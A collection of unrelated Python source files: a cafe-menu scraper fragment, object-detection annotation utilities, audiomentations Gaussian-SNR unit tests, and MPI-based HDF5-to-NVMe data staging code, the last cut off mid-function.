if menu is None or dayparts is None:
raise DataNotAvailableException(
"Data was not available for {} on {}".format(cafe_name,
date_.weekday()))
dishes = _clean_menu(menu)
meals = _clean_meals_and_merge_dishes(dayparts, dishes)
return meals
def _use_labels_as_keys(collection):
""" Given a list or dict of items, returns a dict
with each item's 'label' value as the item's key.
"""
if type(collection) == dict:
return {all_info.pop(u'label'): all_info
for (old_id, all_info) in collection.iteritems()}
elif type(collection) == list:
return {all_info.pop(u'label'): all_info
for all_info in collection}
if __name__ == '__main__':
from datetime import date
print get_meals_for_cafe('burton', date.today())
|
import os
import xml.etree.ElementTree as ET
import matplotlib.font_manager as fm
import numpy as np
from PIL import ImageDraw, ImageFont
def get_label(path):
"""get label info from txt file"""
labels = []
with open(path, encoding='UTF-8') as f:
lines = f.readlines()
for line in lines:
splited = line.strip().split()
labels.append(splited[-1])
return labels
def parse_rec(filename):
"""get annotations from xml files"""
tree = ET.parse(filename)
annots = []
ann_tag = tree.getroot()
size_tag = ann_tag.find('size')
image_width = int(size_tag.find('width').text)
image_height = int(size_tag.find('height').text)
for obj in tree.findall('object'):
obj_struct = {}
obj_struct['name'] = obj.find('name').text
obj_struct['pose'] = obj.find('pose').text
obj_struct['truncated'] = int(obj.find('truncated').text)
obj_struct['difficult'] = int(obj.find('difficult').text)
bbox = obj.find('bndbox')
obj_struct['bbox'] = [int(bbox.find('xmin').text),
int(bbox.find('ymin').text),
int(bbox.find('xmax').text),
int(bbox.find('ymax').text)]
annots.append(obj_struct)
return annots, image_width, image_height
def get_img_annotations(img_list, annotations_dir, standard='dog', single_dog=False):
annotation = []
with open(img_list) as f:
lines = f.readlines()
for line in lines:
splited = line.strip().split()
if splited[1] == '1':
fname = splited[0] + '.jpg'
box = []
label = []
ann = os.path.join(annotations_dir, splited[0] + '.xml')
rec, w, h = parse_rec(ann)
for r in rec:
if r['name'] == standard:
box.append(r['bbox'])
label.append(r['name'])
if single_dog and len(box) > 1:
continue
else:
annotation.append({'fname': fname, 'annots': {'w': w, 'h': h, 'boxes': box, 'labels': label}})
return annotation
def draw(fname, img, dets, scores, save=None):
draw = ImageDraw.Draw(img)
font = ImageFont.truetype(fm.findfont(fm.FontProperties(family='DejaVu Sans')), size=24)
if len(dets):
for (box, score) in zip(dets.tolist(), scores.tolist()):
draw.rectangle(box, outline='blue', width=2)
draw.text((box[0], box[1]), str(round(score, 2)), fill=(0, 255, 0), font=font)
# img.show()
if save is not None:
if not os.path.exists(save):
os.makedirs(save)
save_name = fname.split('/')[-1]
img.save(os.path.join(save, save_name))
def get_scale(params):
max_scale = 130 / params.min_size
min_scale = 130 / params.max_size
factor = np.power(max_scale / min_scale, 1 / (params.scale_num - 1))
scales = [min_scale * np.power(factor, i) for i in range(params.scale_num)]
return scales
def get_dog_gt(anno):
gt = []
for an in anno:
if an['name'] == 'dog':
gt.append(an['bbox'])
return gt
def data2coco(data, file, voc_categories):
json_dict = {"images": [], "type": "instances", "annotations": [],
"categories": []}
categories = voc_categories
bnd_id = 1
for d in data:
filename = d['fname']
image_id = int(os.path.splitext(filename)[0])
width = d['annots']['w']
height = d['annots']['h']
image = {'file_name': filename, 'height': height, 'width': width,
'id': image_id}
json_dict['images'].append(image)
i = 0
for box, label in zip(d['annots']['boxes'], d['annots']['labels']):
category_id = categories[label]
xmin, ymin, xmax, ymax = box[0], box[1], box[2], box[3]
o_width = abs(xmax - xmin)
o_height = abs(ymax - ymin)
ann = {'area': o_width * o_height, 'iscrowd': 0, 'image_id':
image_id, 'bbox': [xmin, ymin, o_width, o_height],
'category_id': category_id, 'id': bnd_id, 'ignore': 0,
'segmentation': []}
if file == 'Dt':
ann.update({'score': d['annots']['scores'][i]})
json_dict['annotations'].append(ann)
bnd_id += 1
i += 1
for cate, cid in categories.items():
cat = {'supercategory': 'none', 'id': cid, 'name': cate}
json_dict['categories'].append(cat)
return json_dict
|
import json
import math
import unittest
import numpy as np
import random
from audiomentations.core.utils import calculate_rms
from audiomentations import AddGaussianSNR
class TestGaussianSNR(unittest.TestCase):
def test_gaussian_noise_snr_defaults(self):
np.random.seed(42)
samples_in = np.random.normal(0, 1, size=1024).astype(np.float32)
augmenter = AddGaussianSNR(p=1.0)
std_in = np.mean(np.abs(samples_in))
with self.assertWarns(UserWarning):
samples_out = augmenter(samples=samples_in, sample_rate=16000)
std_out = np.mean(np.abs(samples_out))
self.assertEqual(samples_out.dtype, np.float32)
self.assertNotAlmostEqual(float(std_out), 0.0)
self.assertGreater(std_out, std_in)
def test_gaussian_noise_snr_legacy_positional_parameter(self):
np.random.seed(42)
samples_in = np.random.normal(0, 1, size=1024).astype(np.float32)
augmenter = AddGaussianSNR(0.001, 1.0, p=1.0)
std_in = np.mean(np.abs(samples_in))
with self.assertWarns(UserWarning):
samples_out = augmenter(samples=samples_in, sample_rate=16000)
std_out = np.mean(np.abs(samples_out))
self.assertEqual(samples_out.dtype, np.float32)
self.assertNotAlmostEqual(float(std_out), 0.0)
self.assertGreater(std_out, std_in)
def test_gaussian_noise_snr_legacy_keyword_parameter(self):
np.random.seed(42)
samples_in = np.random.normal(0, 1, size=1024).astype(np.float32)
augmenter = AddGaussianSNR(min_SNR=0.001, max_SNR=1.0, p=1.0)
std_in = np.mean(np.abs(samples_in))
with self.assertWarns(UserWarning):
samples_out = augmenter(samples=samples_in, sample_rate=16000)
std_out = np.mean(np.abs(samples_out))
self.assertEqual(samples_out.dtype, np.float32)
self.assertNotAlmostEqual(float(std_out), 0.0)
self.assertGreater(std_out, std_in)
def test_gaussian_noise_snr_specify_both_new_and_legacy_params(self):
# Trying to specify both legacy and new parameters. This should raise an exception.
with self.assertRaises(Exception):
augmenter = AddGaussianSNR(
min_SNR=0.001, max_SNR=1.0, min_snr_in_db=15, max_snr_in_db=35, p=1.0
)
def test_gaussian_noise_snr(self):
np.random.seed(42)
samples_in = np.random.normal(0, 1, size=1024).astype(np.float32)
augmenter = AddGaussianSNR(min_snr_in_db=15, max_snr_in_db=35, p=1.0)
std_in = np.mean(np.abs(samples_in))
samples_out = augmenter(samples=samples_in, sample_rate=16000)
std_out = np.mean(np.abs(samples_out))
self.assertEqual(samples_out.dtype, np.float32)
self.assertNotAlmostEqual(float(std_out), 0.0)
self.assertGreater(std_out, std_in)
def test_serialize_parameters(self):
np.random.seed(42)
transform = AddGaussianSNR(min_snr_in_db=15, max_snr_in_db=35, p=1.0)
samples = np.random.normal(0, 1, size=1024).astype(np.float32)
transform.randomize_parameters(samples, sample_rate=16000)
json.dumps(transform.serialize_parameters())
def test_gaussian_noise_snr_multichannel(self):
np.random.seed(42)
samples = np.random.normal(0, 0.1, size=(3, 8888)).astype(np.float32)
augmenter = AddGaussianSNR(min_snr_in_db=15, max_snr_in_db=35, p=1.0)
samples_out = augmenter(samples=samples, sample_rate=16000)
self.assertEqual(samples_out.dtype, np.float32)
self.assertGreater(
float(np.sum(np.abs(samples_out))), float(np.sum(np.abs(samples)))
)
def test_convert_old_parameters_to_new_parameters(self):
np.random.seed(42)
samples_in = np.random.normal(0, 1, size=1024).astype(np.float32)
min_SNR = 0.5
max_SNR = 0.5
min_snr_in_db = -20 * math.log10(min_SNR)
max_snr_in_db = -20 * math.log10(max_SNR)
self.assertAlmostEqual(min_snr_in_db, 6.0205999)
self.assertAlmostEqual(max_snr_in_db, 6.0205999)
legacy_augmenter = AddGaussianSNR(min_SNR=min_SNR, max_SNR=max_SNR, p=1.0)
new_augmenter = AddGaussianSNR(
min_snr_in_db=min_snr_in_db, max_snr_in_db=max_snr_in_db, p=1.0
)
np.random.seed(42)
random.seed(42)
with self.assertWarns(UserWarning):
samples_out_legacy = legacy_augmenter(samples=samples_in, sample_rate=16000)
np.random.seed(42)
random.seed(42)
samples_out_new = new_augmenter(samples=samples_in, sample_rate=16000)
legacy_rms = calculate_rms(samples_out_legacy)
new_rms = calculate_rms(samples_out_new)
self.assertAlmostEqual(legacy_rms, new_rms, places=3)
|
import os
from glob import glob
import itertools
import numpy as np
import time
from queue import LifoQueue as Queue
import torch.cuda.nvtx as nvtx
import copy
import h5py
import subprocess
def get_shard_range(num_files, num_shards, shard_id, cycle_dist=0):
assert (shard_id < num_shards)
# shard files into bulk and remainder:
num_files_per_shard = num_files // num_shards
# num_files_bulk = num_files_per_shard * num_shards
num_files_remainder = num_files % num_shards
shard_start = [0]
for i in range(1, num_shards):
if i - 1 < num_files_remainder:
this_shard_start = shard_start[-1] + (num_files_per_shard + 1)
else:
this_shard_start = shard_start[-1] + (num_files_per_shard)
shard_start.append(this_shard_start)
shard_start.append(num_files)
ranges = []
for i in range(num_shards):
ranges.append((shard_start[i], shard_start[i + 1]))
return ranges[shard_id]
# this routine stages data for each instance
def stage_instance_data(
stage_comm, instance_comm, instance_node_comm,
lsize, lrank,
hdf5file, dataset, target_directory,
batch_size=-1,
stage_num_workers=1,
stage_mode="node",
full_dataset_per_node=True,
use_direct_io=False,
prepare_staging=False, load_hdf5=False, touch=False
):
# comm parameters
# ssize = stage_comm.Get_size()
# srank = stage_comm.Get_rank()
isize = instance_comm.Get_size()
irank = instance_comm.Get_rank()
# nsize = instance_node_comm.Get_size()
# nrank = instance_node_comm.Get_rank()
f = h5py.File(hdf5file, "r")
ds = f.get(dataset)
num_files = ds.shape[0]
# num_files = 1000
shard_start, shard_end = get_shard_range(num_files, isize, irank, cycle_dist=lsize)
chunk_size = 16
chunk_start = shard_start
files_local = []
while True:
chunk_end = min(shard_end, chunk_start + chunk_size)
data = ds[chunk_start:chunk_end]
for i in range(data.shape[0]):
if dataset == "labels":
id_ = "label"
else:
id_ = dataset
outputfile = id_ + "-" + "{:06}".format(chunk_start + i) + ".npy"
if touch:
subprocess.run(['touch', str(os.path.join(target_directory, outputfile))])
else:
np.save(os.path.join(target_directory, outputfile), data[i])
files_local.append(outputfile)
if chunk_end == shard_end:
break
chunk_start = chunk_end
return 0, 0
def stage_data_helper(
global_comm, num_instances, instance_id, instance_comm,
local_size, local_rank, pargs, verify=False,
full_dataset_per_node=True, use_direct_io=False,
seed=333,
prepare_staging=False, touch=False
):
# - Every instance needs all the data, so we need inum replicas.
# - Every rank irank within an instance can stage data_size / isize of the total data
# - Since there are num_instances ranks working on the same data, we could shard this among
# those ranks too
gsize = global_comm.Get_size()
grank = global_comm.Get_rank()
isize = instance_comm.Get_size()
irank = instance_comm.Get_rank()
lsize = local_size
lrank = local_rank
load_hdf5 = False
# create staging filter:
pargs.data_format = "dali-numpy/hdf5" # TODO Fix
if False and (pargs.data_format == "dali-numpy") or (pargs.data_format == 'dali-es'):
stage_filter_list = ['validation/data-*.npy', 'validation/label-*.npy',
'train/data-*.npy', 'train/label-*.npy']
# print("not hdf5", pargs.data_format)
elif pargs.data_format == "dali-numpy/hdf5" or True:
stage_filter_list = ["train.h5/data", "train.h5/labels", "validation.h5/data",
"validation.h5/labels"]
load_hdf5 = True
# print("hdf5!!")
elif pargs.data_format == "dali-dummy":
return
else:
raise NotImplementedError(
f"Error, data-format {pargs.data_format} not implemented for staging"
)
# create subdirectory for each instance, just in case if multiple instances see the same directory
stage_dir = os.path.join(pargs.stage_dir_prefix, f"instance{instance_id}")
if lrank == 0:
os.makedirs(stage_dir, exist_ok=True)
# create the train and validation folders
if lrank == 0:
os.makedirs(os.path.join(stage_dir, "train"), exist_ok=True)
os.makedirs(os.path.join(stage_dir, "validation"), exist_ok=True)
# split the global communicator according to irank: key could be instance_id but we would end up
stage_comm = global_comm.Split(color=irank, key=instance_id)
# split the instance by nodes and create a comm with all matching local ranks by node
instance_node_id = irank // lsize
instance_node_comm = instance_comm.Split(color=lrank, key=instance_node_id)
# iterate over staging filters
file_stats = {}
for stage_filter in stage_filter_list:
nvtx.range_push(f"stage {stage_filter}")
if not prepare_staging and (grank == 0):
print(f"Staging {stage_filter}", flush=True)
elif irank == 0:
print(f"Preparing file lists for {stage_dir} {stage_filter}", flush=True)
# get directories
if not load_hdf5:
stage_source_directory = os.path.join(
pargs.data_dir_prefix, os.path.dirname(stage_filter)
)
else:
tmp = stage_filter.split("/")
fname, dataset = tmp[0], tmp[1]
hdf5_file = os.path.join(pargs.data_dir_prefix, fname)
stage_target_directory = os.path.join(stage_dir, stage_filter.split(".")[0])
# create target directory if not exist:
if local_rank == 0:
os.makedirs(stage_target_directory, exist_ok=True)
if not load_hdf5:
# get file info to everybody
if grank == 0 and not load_hdf5:
allfiles = sorted(
glob(os.path.join(stage_source_directory, os.path.basename(stage_filter)))
)
else:
allfiles = None
# shuffle files if requested
if (grank == 0) and (not full_dataset_per_node) and (seed is not None):
rng = np.random.default_rng(seed)
rng.shuffle(allfiles)
# communicate list of files
allfiles = global_comm.bcast(allfiles, 0)
# now stage the data so that each rank in each instance has the relevant data
stage_start = time.perf_counter()
total_read, total_write = stage_instance_data(
stage_comm, instance_comm, instance_node_comm,
lsize, lrank,
hdf5_file, dataset, stage_target_directory,
pargs.stage_batch_size,
pargs.stage_num_workers,
pargs.stage_mode,
full_dataset_per_node,
use_direct_io,
prepare_staging, load_hdf5=load_hdf5,
touch=touch
)
stage_stop = time.perf_counter()
# updating file stats buffer
file_stats[stage_filter] = 0 # len(allfiles)
# skip the rest if we want to prep staging only
if prepare_staging:
continue
# unit conversion
unit_convert_gb = 1. / float(1024 * 1024 * 1024)
# allreduce:
total_read = global_comm.allreduce(total_read)
total_write = global_comm.allreduce(total_write)
# convert units
total_read *= unit_convert_gb
total_write *= unit_convert_gb
# stage duration:
stage_duration = stage_stop - stage_start
# print
if grank == 0:
print(
f"""Staging {stage_filter} done.
Total number of files: {file_stats[stage_filter]}.
Elapsed time {stage_duration:.2f}s.
Read {total_read:.2f} GB (bandwidth: {total_read / stage_duration:.2f} GB/s).
Write {total_write:.2f} GB (bandwidth: {total_write / stage_duration:.2f} GB/s).
"""
)
# verify staging results if requested
if verify:
nvtx.range_push(f"stage_verify")
if local_rank == 0:
files = glob(os.path.join(stage_target_directory, os.path.basename(stage_filter)))
else:
files = []
if not full_dataset_per_node:
# if every node hosts a shard, we need to sum the results, if not we need to make sure everybody has the same
files_full = instance_comm.allgather(files)
files_full = set(itertools.chain(*files_full))
else:
files_full = set(files)
num_files = len(files_full)
# strip off the directory
checkfiles1 = sorted([os.path.basename(x) for x in files_full])
checkfiles2 = sorted([os.path.basename(x) for x in allfiles])
assert (num_files == file_stats[stage_filter])
assert (checkfiles1 == checkfiles2)
if irank == 0:
print(
f"Staged data for {stage_filter}: {num_files}, expected: {file_stats[stage_filter]}",
flush=True
)
nvtx.range_pop()
# close range
nvtx.range_pop()
return 121266, 15158
def touch_files_in_stage_dir(
global_comm, instance_comm, instance_id, local_size, local_rank, pargs
):
# need to touch all of the files
isize = instance_comm.Get_size()
irank = instance_comm.Get_rank()
lrank = local_rank
# create subdirectory for each instance, just in case if multiple instances see the same directory
if pargs.data_staging_method == "instance":
stage_dir = os.path.join(pargs.stage_dir_prefix, f"instance{instance_id}")
elif pargs.data_staging_method == "nodes":
stage_dir = os.path.join(pargs.stage_dir_prefix, f"instance{instance_id}")
node_num = global_comm.Get_rank() // 4
stage_dir = os.path.join(stage_dir, str(node_num))
elif pargs.data_staging_method == "full":
stage_dir = pargs.stage_dir_prefix
else:
raise ValueError(f"invalid data staging method: {pargs.data_staging_method}")
if lrank == 0:
os.makedirs(stage_dir, exist_ok=True)
# create the train and validation folders
train_dir = os.path.join(stage_dir, "train")
val_dir = os.path.join(stage_dir, "validation")
if lrank == 0:
os.makedirs(train_dir, exist_ok=True)
os.makedirs(val_dir, exist_ok=True)
data_filter = '*data-*.npy'
label_filter = '*label-*.npy'
train_data_files = sorted(glob.glob(os.path.join(train_dir, data_filter)))
train_label_files = sorted(glob.glob(os.path.join(train_dir, label_filter)))
val_data_files = sorted(glob.glob(os.path.join(train_dir, data_filter)))
val_label_files = sorted(glob.glob(os.path.join(train_dir, label_filter)))
# NOTE: THIS CREATES FILES FOR EACH INSTANCE!!
num_train, num_val = 121266, 15158
train_shard_sz = num_train // isize
train_shards = [train_shard_sz * i for i in range(isize)] + [num_train, ]
val_shard_sz = num_val // isize
val_shards = [val_shard_sz * i for i in range(isize)] + [num_val, ]
train_slice = slice(train_shards[irank], train_shards[irank + 1])
val_slice = slice(val_shards[irank], val_shards[irank + 1])
itrain_files = train_data_files[train_slice]
itrain_labels = train_label_files[train_slice]
for files in itrain_files:
base_name = os.path.basename(files)
f = os.path.join(train_dir, base_name)
subprocess.run(['touch', str(f)])
for files in itrain_labels:
base_name = os.path.basename(files)
f = os.path.join(train_dir, base_name)
subprocess.run(['touch', str(f)])
ival_files = val_data_files[val_slice]
ival_labels = val_label_files[val_slice]
for files in ival_files:
base_name = os.path.basename(files)
f = os.path.join(val_dir, base_name)
subprocess.run(['touch', str(f)])
for files in ival_labels:
base_name = os.path.basename(files)
f = os.path.join(val_dir, base_name)
subprocess.run(['touch', str(f)])
def stage_to_NVMe_node_folders_h5(
global_comm, num_instances, instance_id, instance_comm,
local_size, local_rank, pargs, verify=False,
full_dataset_per_node=True, use_direct_io=False,
seed=333, prepare_staging=False,
number_workers=6, touch=False
):
# NOTE: this will use the global comm exclusivly
# only stage the shard of the data which will go on that node
# TODO: tell DALI that this data is already staged (use dali-numpy?)
# each instance gets a full dataset, so we need inum replicas.
# REMINDER: data is already shuffled in the file
# 0. create folder for each node in the NVMe dir -> instance_num/instance_node/(train/val)
# 1. get full length
# 2. get number of items per rank in instance
# - Every rank irank within an instance can stage data_size / isize of the total data
# - Since there are num_instances ranks working on the same data, we could shard this among
# those ranks too
gsize = global_comm.Get_size()
grank = global_comm.Get_rank()
isize = instance_comm.Get_size()
irank = instance_comm.Get_rank()
lsize = local_size # get the number of GPUs on each node
lrank = local_rank # get the node-local rank
# create staging filter:
if pargs.data_format.endswith("hdf5"):
stage_filter_list = ["train.h5/data", "train.h5/labels", "validation.h5/data",
"validation.h5/labels"]
# print("hdf5!!")
elif pargs.data_format == "dali-dummy":
return
else:
raise NotImplementedError(
f"Error, data-format {pargs.data_format} not implemented for h5 staging"
)
stage_dir = os.path.join(pargs.stage_dir_prefix, f"instance{instance_id}")
node_num = grank // 4
stage_dir = os.path.join(stage_dir, str(node_num))
os.makedirs(stage_dir, exist_ok=True)
os.makedirs(os.path.join(stage_dir, "train"), exist_ok=True)
os.makedirs(os.path.join(stage_dir, "validation"), exist_ok=True)
# print(f"stage dir {stage_dir}")
# stage_dir -> /NVMe_folder/instance_num/node_number/
stage_comm = global_comm.Split(color=irank, key=instance_id)
# iterate over staging filters
file_stats = {}
for stage_filter in stage_filter_list:
nvtx.range_push(f"stage {stage_filter}")
# if not prepare_staging and (grank == 0):
# print(f"Staging {stage_filter}", flush=True)
# elif grank == 0: # this should run for the single h5
# print(f"Preparing file lists for {stage_filter}", flush=True)
# get directories
tmp = stage_filter.split("/") # split off the data/lable at the end of the stage_filer
fname, dataset = tmp[0], tmp[1] # h5 file, (data/label)
hdf5_file = os.path.join(pargs.data_dir_prefix, fname)
stage_target_directory = os.path.join(stage_dir, stage_filter.split(".")[0])
# now stage the data so that each rank in each instance has the relevant data
stage_start = time.perf_counter()
# print(f"stage_target_directory: {stage_target_directory}")
total_read, total_write = stage_instance_data_nvme(
stage_comm, global_comm, instance_comm, hdf5_file, dataset, stage_target_directory, touch=touch
)
stage_stop = time.perf_counter()
# updating file stats buffer
file_stats[stage_filter] = 0
# skip the rest if we want to prep staging only
if prepare_staging:
continue
# unit conversion
unit_convert_gb = 1. / float(1024 * 1024 * 1024)
# allreduce:
total_read = global_comm.allreduce(total_read)
total_write = global_comm.allreduce(total_write)
# convert units
total_read *= unit_convert_gb
total_write *= unit_convert_gb
# stage duration:
stage_duration = stage_stop - stage_start
# print
if grank == 0:
print(
f"""Staging {stage_filter} done.
Total number of files: {file_stats[stage_filter]}.
Elapsed time {stage_duration:.2f}s.
Read {total_read:.2f} GB (bandwidth: {total_read / stage_duration:.2f} GB/s).
Write {total_write:.2f} GB (bandwidth: {total_write / stage_duration:.2f} GB/s).
"""
)
# verify staging results if requested
if verify:
nvtx.range_push(f"stage_verify")
if local_rank == 0:
files = glob(os.path.join(stage_target_directory, os.path.basename(stage_filter)))
else:
files = []
if not full_dataset_per_node:
# if every node hosts a shard, we need to sum the results, if not we need to make sure everybody has the same
files_full = instance_comm.allgather(files)
files_full = set(itertools.chain(*files_full))
else:
files_full = set(files)
num_files = len(files_full)
# strip off the directory
checkfiles1 = sorted([os.path.basename(x) for x in files_full])
checkfiles2 = sorted([os.path.basename(x) for x in allfiles])
assert (num_files == file_stats[stage_filter])
assert (checkfiles1 == checkfiles2)
if irank == 0:
print(
f"Staged data for {stage_filter}: {num_files}, expected: {file_stats[stage_filter]}",
flush=True
)
nvtx.range_pop()
# close range
nvtx.range_pop()
return 121266, 15158
def stage_instance_data_nvme(
stage_comm, global_comm, instance_comm, hdf5file, dataset, target_directory, touch=False
):
isize = instance_comm.Get_size()
irank = instance_comm.Get_rank()
f = h5py.File(hdf5file, "r")
ds = f.get(dataset)
num_files = ds.shape[0]
# num_files = 100
# get shard range ========================================
# number of shards is the number of ranks in an instance
num_shards = isize
num_files_per_shard = num_files // num_shards
num_files_remainder = num_files % num_shards
shard_start = [0]
for i in range(1, num_shards):
# ensure that there is an even number of files
if i - 1 < num_files_remainder:
this_shard_start = shard_start[-1] + (num_files_per_shard + 1)
else:
this_shard_start = shard_start[-1] + num_files_per_shard
shard_start.append(this_shard_start)
shard_start.append(num_files)
ranges = []
for i in range(num_shards):
ranges.append((shard_start[i], shard_start[i + 1]))
shard_start, shard_end = ranges[irank]
chunk_size = 32
chunk_start = shard_start
files_local = []
while True:
chunk_end = min(shard_end, chunk_start + chunk_size)
data = ds[chunk_start:chunk_end]
for i in range(data.shape[0]):
if dataset == "labels":
id_ = "label"
else:
id_ = dataset
outputfile = id_ + "-" + "{:06}".format(chunk_start + i) + ".npy"
if touch:
subprocess.run(['touch', str(os.path.join(target_directory, outputfile))])
else:
np.save(os.path.join(target_directory, outputfile), data[i])
files_local.append(outputfile)
if chunk_end == shard_end:
break
chunk_start = chunk_end
return 0, 0
def stage_to_NVMe_all_shared_h5(
global_comm, num_instances, instance_id, instance_comm,
local_size, local_rank, pargs, verify=False,
full_dataset_per_node=True, use_direct_io=False,
seed=333, prepare_staging=False,
number_workers=6, touch=False,
):
# NOTE: this will use the global comm exclusivly
# only stage the shard of the data which will go on that node
# each instance gets a full dataset, so we need inum replicas.
# REMINDER: data is already shuffled in the file
# 0. create folder for each node in the NVMe dir -> instance_num/instance_node/(train/val)
# 1. get full length
# 2. get number of items per rank in instance
# - Every rank irank within an instance can stage data_size / isize of the total data
# - Since there are num_instances ranks working on the same data, we could shard this among
# those ranks too
gsize = global_comm.Get_size()
grank = global_comm.Get_rank()
lsize = local_size # get the number of GPUs on each node
lrank = local_rank # get the node-local rank
# print(f"Start staging, gsize {gsize} grank {grank} lsize {lsize} lrank {lrank}")
if pargs.data_format.endswith("hdf5"):
stage_filter_list = ["train.h5/data", "train.h5/labels", "validation.h5/data",
"validation.h5/labels"]
elif pargs.data_format == "dali-dummy":
return
else:
raise NotImplementedError(
f"Error, data-format {pargs.data_format} not implemented for h5 staging"
)
stage_dir = pargs.stage_dir_prefix
if lrank == 0:
os.makedirs(os.path.join(stage_dir, "train"), exist_ok=True)
os.makedirs(os.path.join(stage_dir, "validation"), exist_ok=True)
# print(f"stage dir {stage_dir}")
# stage_dir -> /NVMe_folder/
# iterate over staging filters
file_stats = {}
for stage_filter in stage_filter_list:
nvtx.range_push(f"stage {stage_filter}")
if not prepare_staging and (grank == 0):
print(f"Staging {stage_filter}", flush=True)
elif grank == 0: # this should run for the single h5
print(f"Preparing file lists for {stage_filter}", flush=True)
tmp = stage_filter.split("/") # split off the data/lable at the end of the stage_filer
fname, dataset = tmp[0], tmp[1] # h5 file, (data/label)
hdf5_file = os.path.join(pargs.data_dir_prefix, fname)
stage_target_directory = os.path.join(stage_dir, stage_filter.split(".")[0])
# now stage the data so that each rank in each instance has the relevant data
stage_start = time.perf_counter()
# print(f"stage_target_directory: {stage_target_directory} touch: {touch}")
total_read, total_write = stage_instance_data_nvme_all_shared(
global_comm, hdf5_file, dataset, stage_target_directory, stage_dir, touch=touch
)
stage_stop = time.perf_counter()
# updating file stats buffer
file_stats[stage_filter] = 0 # len(allfiles)
# skip the rest if we want to prep staging only
if prepare_staging:
continue
# unit conversion
unit_convert_gb = 1. / float(1024 * 1024 * 1024)
# allreduce:
total_read = global_comm.allreduce(total_read)
total_write = global_comm.allreduce(total_write)
# convert units
total_read *= unit_convert_gb
total_write *= unit_convert_gb
# stage duration:
stage_duration = stage_stop - stage_start
# print
if grank == 0:
print(
f"""Staging {stage_filter} done.
Total number of files: {file_stats[stage_filter]}.
Elapsed time {stage_duration:.2f}s.
Read {total_read:.2f} GB (bandwidth: {total_read / stage_duration:.2f} GB/s).
Write {total_write:.2f} GB (bandwidth: {total_write / stage_duration:.2f} GB/s).
"""
)
# verify staging results if requested
if verify:
nvtx.range_push(f"stage_verify")
if local_rank == 0:
files = glob(os.path.join(stage_target_directory, os.path.basename(stage_filter)))
else:
files = []
if not full_dataset_per_node:
# if every node hosts a shard, we need to sum the results, if not we need to make sure everybody has the same
files_full = instance_comm.allgather(files)
files_full = set(itertools.chain(*files_full))
else:
files_full = set(files)
num_files = len(files_full)
# strip off the directory
checkfiles1 = sorted([os.path.basename(x) for x in files_full])
checkfiles2 = sorted([os.path.basename(x) for x in allfiles])
assert (num_files == file_stats[stage_filter])
assert (checkfiles1 == checkfiles2)
if irank == 0:
print(
f"Staged data for {stage_filter}: {num_files}, expected: {file_stats[stage_filter]}",
flush=True
)
nvtx.range_pop()
# close range
nvtx.range_pop()
global_comm.Barrier()
return 121266, 15158
def stage_instance_data_nvme_all_shared(
global_comm, hdf5file, dataset, target_directory, stage_dir, touch=False
):
gsize = global_comm.Get_size()
grank = global_comm.Get_rank()
f = h5py.File(hdf5file, "r")
ds = f.get(dataset)
num_files = ds.shape[0]
# num_files = 100
# get shard range ========================================
# number of shards is the number of ranks in an instance
num_shards = gsize
num_files_per_shard = num_files // num_shards
num_files_remainder = num_files % num_shards
shard_start = [0]
for i in range(1, num_shards):
# ensure that there is an even number of files
if i - 1 < num_files_remainder:
this_shard_start = shard_start[-1] + (num_files_per_shard + 1)
else:
this_shard_start = shard_start[-1] + num_files_per_shard
shard_start.append(this_shard_start)
shard_start.append(num_files)
ranges = []
for i in range(num_shards):
ranges.append((shard_start[i], shard_start[i + 1]))
shard_start, shard_end = ranges[grank]
chunk_size = 16
chunk_start = shard_start
while True:
chunk_end = min(shard_end, chunk_start + chunk_size)
data = ds[chunk_start:chunk_end]
for i in range(data.shape[0]):
if dataset == "labels":
id_ = "label"
outputfile = id_ + "-" + "{:06}".format(chunk_start + i) + ".npy"
else:
id_ = dataset
outputfile = id_ + "-" + "{:06}".format(chunk_start + i) + ".npy"
if not touch:
np.save(os.path.join(target_directory, outputfile), data[i])
else:
subprocess.run(['touch', str(os.path.join(target_directory, outputfile))])
if chunk_end == shard_end:
break
chunk_start = chunk_end
return 0, 0
def stage_to_NVMe_instance_rank_folders_h5(
global_comm, num_instances, instance_id, instance_comm,
local_size, local_rank, pargs, verify=False,
full_dataset_per_node=True, use_direct_io=False,
seed=333, prepare_staging=False,
number_workers=6, touch=False
):
# NOTE: this will use the global comm exclusivly
# only stage the shard of the data which will go on that node
# TODO: tell DALI that this data is already staged (use dali-numpy?)
# each instance gets a full dataset, so we need inum replicas.
# REMINDER: data is already shuffled in the file
# 0. create folder for each node in the NVMe dir -> instance_num/instance_node/(train/val)
# 1. get full length
# 2. get number of items per rank in instance
# - Every rank irank within an instance can stage data_size / isize of the total data
# - Since there are num_instances ranks working on the same data, we could shard this among
# those ranks too
# gsize = global_comm.Get_size()
grank = global_comm.Get_rank()
# isize = instance_comm.Get_size()
irank = instance_comm.Get_rank()
# lsize = local_size # get the number of GPUs on each node
# lrank = local_rank # get the node-local rank
# print(f"Start staging, gsize {gsize} grank {grank} isize {isize} irank {irank} lsize {lsize} "
# f"lrank {lrank}")
if pargs.data_format.endswith("hdf5"):
stage_filter_list = ["train.h5/data", "train.h5/labels", "validation.h5/data",
"validation.h5/labels"]
# print("hdf5!!")
elif pargs.data_format == "dali-dummy":
return
else:
raise NotImplementedError(
f"Error, data-format {pargs.data_format} not implemented for h5 staging"
)
# create subdirectory for each instance, just in case if multiple instances see the same directory
node_number = grank // 4 # 4 gpus per node
stage_dir = os.path.join(pargs.stage_dir_prefix, str(irank))
os.makedirs(stage_dir, exist_ok=True)
# print(f"{grank} {lrank} {node_number} stage dir: {stage_dir}")
# if lrank == 0: # should be fine to try to make it from every rank
os.makedirs(os.path.join(stage_dir, "train"), exist_ok=True)
os.makedirs(os.path.join(stage_dir, "validation"), exist_ok=True)
print(f"stage dir {stage_dir}")
# stage_dir -> /NVMe_folder/instance_rank
# iterate over staging filters
file_stats = {}
for stage_filter in stage_filter_list:
nvtx.range_push(f"stage {stage_filter}")
if not prepare_staging and (grank == 0):
print(f"Staging {stage_filter}", flush=True)
elif grank == 0: # this should run for the single h5
print(f"Preparing file lists for {stage_filter}", flush=True)
tmp = stage_filter.split("/") # split off the data/lable at the end of the stage_filer
fname, dataset = tmp[0], tmp[1] # h5 file, (data/label)
hdf5_file = os.path.join(pargs.data_dir_prefix, fname)
stage_target_directory = os.path.join(stage_dir, stage_filter.split(".")[0])
# now stage the data so that each rank in each instance has the relevant data
stage_start = time.perf_counter()
print(f"stage_target_directory: {stage_target_directory}")
total_read, total_write = stage_instance_data_nvme_instance_ranks(
global_comm, instance_comm, hdf5_file, dataset, stage_target_directory, instance_id, touch=touch
)
stage_stop = time.perf_counter()
# updating file stats buffer
